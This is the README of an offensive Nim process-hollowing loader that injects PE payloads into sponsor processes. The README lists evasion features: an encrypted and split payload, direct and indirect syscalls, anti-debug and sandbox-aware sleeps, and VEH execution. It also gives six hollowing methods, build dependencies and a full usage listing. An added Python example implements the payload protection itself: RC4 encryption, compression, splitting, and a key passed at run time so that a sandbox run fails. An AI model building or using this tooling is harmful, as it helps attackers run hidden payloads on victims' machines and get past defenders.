--== Process hollowing loader written in Nim for PEs only ==--
I built PichichiH0ll0wer to learn and contribute, sure, but also because I'm quite tired of shellcode everywhere. Loading PEs might be less evasive, I know, but it's still effective and more convenient than fighting to turn your PE payload into shellcode every time (which doesn't always go smoothly). PichichiH0ll0wer also has some features to protect your payload. Only x64 EXEs are supported.
- Configurable builder
- Payload is compressed and encrypted (and optionally split) inside the hollow loader
- Supports split injection across multiple processes
- Supports direct and indirect system calls
- The hollower does not use the highly suspicious NtUnmapViewOfSection/ZwUnmapViewOfSection call
- Can build EXE or DLL hollow loaders
- Can block DLLs not signed by Microsoft from being loaded into the hollowed process
- Anti-debug checks, with the option to exit or to burn CPU on useless calculations ('troll' mode) when a debugger is detected
- Obfuscated sleep implemented with useless calculations
- Supports running the hollowing routine from within a vectored exception handler (VEH)
- Supports an RC4 key passed on the command line to decrypt the payload
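The payload-protection features above (compress and RC4-encrypt the PE, optionally split the blob, take the key from the command line) as a small reference pipeline. This is an added example written for this page, not PichichiH0ll0wer's own code: zlib stands in for the project's supersnappy compression, and the function names, the demo key and the constructed fake PE header are all assumptions. The loader-side path shows the failure mode worth getting right: with a wrong or missing key the recovered bytes are garbage, so the loader must refuse to hollow instead of jumping into them; the Machine check mirrors the tool's x64-only scope.

```python
"""Builder/loader payload protection in the style of an encrypted-PE hollower.

Added example, not the project's code. Builder side: compress, then RC4-encrypt the
PE with a key that is NOT embedded in the loader binary. Loader side: take the key
from the command line, decrypt, decompress, and sanity-check before hollowing.
zlib is used here where the project uses Snappy (supersnappy); names are assumptions.
"""
import struct
import sys
import zlib
from typing import List, Optional

IMAGE_FILE_MACHINE_AMD64 = 0x8664  # Machine field value for x64 PEs


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA). Symmetric: the same call encrypts and decrypts."""
    if not key:
        raise ValueError("empty RC4 key")
    s = list(range(256))
    j = 0
    for i in range(256):  # key-scheduling algorithm
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray(len(data))
    i = j = 0
    for n, byte in enumerate(data):  # pseudo-random generation, XORed onto data
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out[n] = byte ^ s[(s[i] + s[j]) & 0xFF]
    return bytes(out)


def build_blob(pe: bytes, key: bytes) -> bytes:
    """Builder side: compress first (ciphertext does not compress), then encrypt."""
    return rc4(key, zlib.compress(pe, 9))


def split_blob(blob: bytes, parts: int) -> List[bytes]:
    """Optional 'split' feature: scatter the blob over several constants so no
    single contiguous high-entropy buffer sits in the loader."""
    size = -(-len(blob) // parts)  # ceiling division
    return [blob[i:i + size] for i in range(0, len(blob), size)]


def is_x64_pe(image: bytes) -> bool:
    """Minimal header check: MZ, in-bounds e_lfanew, PE\\0\\0, Machine == AMD64."""
    if len(image) < 0x40 or image[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if e_lfanew + 6 > len(image) or image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return False
    machine = struct.unpack_from("<H", image, e_lfanew + 4)[0]
    return machine == IMAGE_FILE_MACHINE_AMD64


def recover_payload(blob: bytes, key: bytes) -> Optional[bytes]:
    """Loader side: decrypt, decompress, validate. Returns None on any failure so a
    wrong key (e.g. a sandbox running the loader with no arguments) never results
    in hollowing a process with garbage."""
    try:
        image = zlib.decompress(rc4(key, blob))
    except zlib.error:
        return None
    return image if is_x64_pe(image) else None


def fake_x64_pe() -> bytes:
    """Constructed stand-in for a real x64 EXE: just enough header to pass is_x64_pe."""
    hdr = bytearray(0x48)
    hdr[:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, 0x40)          # e_lfanew -> 0x40
    hdr[0x40:0x44] = b"PE\0\0"
    struct.pack_into("<H", hdr, 0x44, IMAGE_FILE_MACHINE_AMD64)
    return bytes(hdr) + b"\x90" * 4096               # padding so compression matters


if __name__ == "__main__":
    # The key comes from argv, as the tool's -k option does; it is never stored.
    key = sys.argv[1].encode() if len(sys.argv) > 1 else b"demo-key"
    blob = b"".join(split_blob(build_blob(fake_x64_pe(), key), 3))
    print("recovered" if recover_payload(blob, key) else "wrong key or not an x64 PE")
```

Run it as `python protect.py <key>`; any other key prints the refusal message instead of an image, which is exactly what the loader should do before it ever touches a sponsor process.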
1. Simple hollowing: the usual sequence, VirtualAlloc -> WriteProcessMemory -> GetThreadContext -> SetThreadContext -> ResumeThread.
2. Direct syscalls hollowing: using the great NimlineWhispers2.
3. Indirect syscalls hollowing: using the great NimlineWhispers3.
4. Split hollowing: each step of method (1) runs in a separate process, with the handles inherited.
5. Split hollowing with direct syscalls: each step of method (2) runs in a separate process, with the handles inherited.
6. Split hollowing with indirect syscalls: each step of method (3) runs in a separate process, with the handles inherited.
Example: split hollowing of cscript.exe (sponsor) with cmd.exe (payload), which in turn spawns whoami.exe.
Built with Nim 1.6.12; runs on Windows only. Install the dependencies with:
nimble install winim ptr_math nimprotect supersnappy argparse
Usage:
  [options] exe_file injection_method

Arguments:
  exe_file          Exe file to load
  injection_method  Injection method
                    1 - Simple hollowing
                    2 - Direct syscalls hollowing
                    3 - Indirect syscalls hollowing
                    4 - Splitted hollowing using multiple processes
                    5 - Splitted hollowing using multiple processes and direct syscalls
                    6 - Splitted hollowing using multiple processes and indirect syscalls

Options:
  -h, --help
  -s, --sponsor=SPONSOR        Sponsor path to hollow (default: self hollowing)
  -a, --args=ARGS              Command line arguments to append to the hollowed process
  -f, --format=FORMAT          PE hollower format. Possible values: [exe, dll] (default: exe)
  -e, --export=EXPORT          DLL export name (relevant only for Dll format) (default: DllRegisterServer)
  -b, --block                  Block unsigned Microsoft Dlls in the hollowed process
  -p, --split                  Split and hide the payload blob in hollower (takes long to compile!)
  -t, --sleep=SLEEP            Number of seconds to sleep before hollowing (default: 0)
  -g, --anti-debug=ANTI_DEBUG  Action to perform upon debugger detection. Possible values: [none, die, troll] (default: none)
  -k, --key=KEY                RC4 key to [en/de]crypt the payload (supplied as a command line argument to the hollower)
  -v, --veh                    Hollow will occur within VEH
  -d, --debug                  Compile as debug instead of release (loader is verbose)
Also, check the examples.